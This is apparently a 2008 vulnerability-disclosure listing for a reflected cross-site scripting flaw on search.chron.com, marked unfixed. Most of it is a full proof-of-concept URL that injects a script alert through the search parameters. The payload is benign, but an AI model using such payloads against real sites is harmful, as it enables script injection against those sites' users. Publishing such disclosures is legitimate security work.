Security researcher tenest, has submitted on 03/01/2008 a cross-site-scripting (XSS) vulnerability affecting search.chron.com, which at the time of submission ranked 4107 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 04/01/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 03/01/2008 |
Date published: 04/01/2008 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: tenest |
Domain: search.chron.com |
Category: XSS |
Pagerank: 4107 |
|---|
URL: http://search.chron.com/chronicle/search.do?basicSearchFormComponent.resultsPerPage=10&basicSearchFo
rmComponent.pageNum=1&basicSearchFormComponent.maxResults=1000&basicSearchFormComponent.mode=search&
basicSearchFormComponent.booleanMode=false&basicSearchFormComponent.propertyGroup=CHRONICLE&basicSea
rchFormComponent.configName=basic&basicSearchFormComponent.siteName=Chronicle&basicSearchFormCompone
nt.suggestedFromDoc=&basicSearchFormComponent.suggestedTitle=&basicSearchFormComponent.contextMode=f
alse&basicSearchFormComponent.shadowSearchText=%22%3EHELLO%3Cscript%3Ealert%28%27xssed%27%29%3B%3C%2
Fscript%3E&basicSearchFormComponent.shadowDatabaseList=&basicSearchFormComponent.fieldText=&resultNa
vigationFormComponent.propertyGroup=CHRONICLE&resultNavigationFormComponent.configName=taxonomy&resu
ltNavigationFormComponent.selectedPath=&resultNavigationFormComponent.currentNavigationTree=&resultN
avigationFormComponent.limitResults=0&iqlRulesFormComponent.configName=iql&iqlRulesFormComponent.pro
cessManualRules=true&iqlRulesFormComponent.processSponsoredRules=true&iqlRulesFormComponent.processC
oncepts=true&advancedSearchFormComponent.searchAllWordsText=&advancedSearchFormComponent.searchExact
PhraseText=&advancedSearchFormComponent.searchAtleastOneText=&advancedSearchFormComponent.searchWith
outText=&advancedSearchFormComponent.selectedTermLocation=&advancedSearchFormComponent.selectedLangu
age=&advancedSearchFormComponent.selectedInterval=&archiveSearchFormComponent.searchAnywhere=&archiv
eSearchFormComponent.searchHeadline=&archiveSearchFormComponent.searchAuthor=&archiveSearchFormCompo
nent.selectedSection=&archiveSearchFormComponent.selectedInterval=7&archiveSearchFormComponent.selec
tedFromMonth=&archiveSearchFormComponent.selectedFromDay=&archiveSearchFormComponent.selectedFromYea
r=2007&archiveSearchFormComponent.selectedToMonth=&archiveSearchFormComponent.selectedToDay=&archive
SearchFormComponent.selectedToYear=2007&selectedSort=Date&basicSearchFormComponent.searchText=%22%3E
HELLO%3Cscript%3Ealert%28%27xssed%27%29%3B%3C%2Fscript%3E&basicSearchFormComponent.selectedDatabaseN
ames=Everything&search=Go |
|
Click here to view the mirror
|
|
|
| 
